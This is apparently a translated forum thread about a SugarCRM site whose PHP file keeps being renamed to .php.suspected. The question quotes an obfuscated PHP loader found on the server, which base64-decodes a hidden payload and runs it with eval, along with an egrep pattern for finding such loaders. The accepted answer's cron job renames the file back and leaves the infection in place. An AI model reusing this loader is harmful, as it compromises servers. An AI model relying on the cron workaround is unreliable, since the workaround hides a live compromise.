php文件自动重命名为php.suspected

Amo*_*ane 13 php linux apache amazon-ec2 sugarcrm

自从过去4天以来,我们在生产服务器(AWS EC2实例)上面临着一个奇怪的问题,该问题仅针对一个SugarCRM站点.

问题是/home/site_folder/public_html/include/MassUpdate.php文件自动重命名为/home/site_folder/public_html/include/MassUpdate.php.suspected

这种情况一天发生2-3次,间隙为3-4小时.仅在特定站点的情况下才会出现此问题,即使对于同一站点的暂存副本也不会发生此问题.我甚至从两个站点检查了该文件的代码,它是一样的.

我们使用Google搜索并发现,此问题主要发生在Wordpress网站上,可能是因为攻击.但我们检查了我们的服务器对抗攻击,没有任何.此外,服务器上没有运行病毒/恶意软件扫描.

我们应该做什么?

更新: 我们在通过此链接后发现了一些事情 我们执行egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/并发现有少量文件包含以下示例代码.

    <?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Run Code Online (Sandbox Code Playgroud)

似乎有些恶意软件,我们如何永久删除它?

谢谢

Amo*_*ane 0

发布这个答案,可能会对其他人有所帮助。

  1. 在您方便的位置创建一个扩展名为“.sh”的文件。
  2. 在其中添加以下代码。

#Rename your_file_name.php.suspected to your_file_name.php mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

  1. 保存此文件。
  2. 每 10 分钟(或您需要的任何时间间隔)设置 cron,使用 crontab 中的以下行

*/10 * * * * path_to_cron_file.sh

  1. 重新启动 crontab 服务。

您将在 Google 上获得大量有关创建 cron 的文档。